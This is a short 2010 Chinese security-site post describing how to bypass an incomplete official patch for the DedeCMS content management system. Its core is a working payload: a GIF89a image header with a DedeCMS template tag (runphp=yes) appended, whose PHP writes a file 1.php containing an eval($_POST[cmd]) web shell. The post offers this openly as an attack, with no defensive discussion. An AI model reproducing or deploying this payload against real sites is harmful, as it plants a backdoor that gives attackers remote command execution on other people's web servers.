频道栏目
首页 > 安全 > 网站安全 > 正文
织梦DEDECMS补丁后的getshell
2010-11-27 10:04:41      个评论      
收藏   我要投稿

还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。

现在其基础上,修改图片代码实现最新版本补丁突破。
找一张图片,在保留图片代码的同时,插入如下代码

GIF89aGIF89a {dede:name runphp=yes}
$fp = @fopen("1.php", a);
@fwrite($fp, <.?php." ".eval($_POST[cmd])." ?"."> ");
@fclose($fp);
{/dede:name}
点击复制链接 与好友分享!回本站首页
相关TAG标签 补丁
上一篇:一些跨目录的方法总结
下一篇:foosun cms(风讯内容管理系统)建目录漏洞实践
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站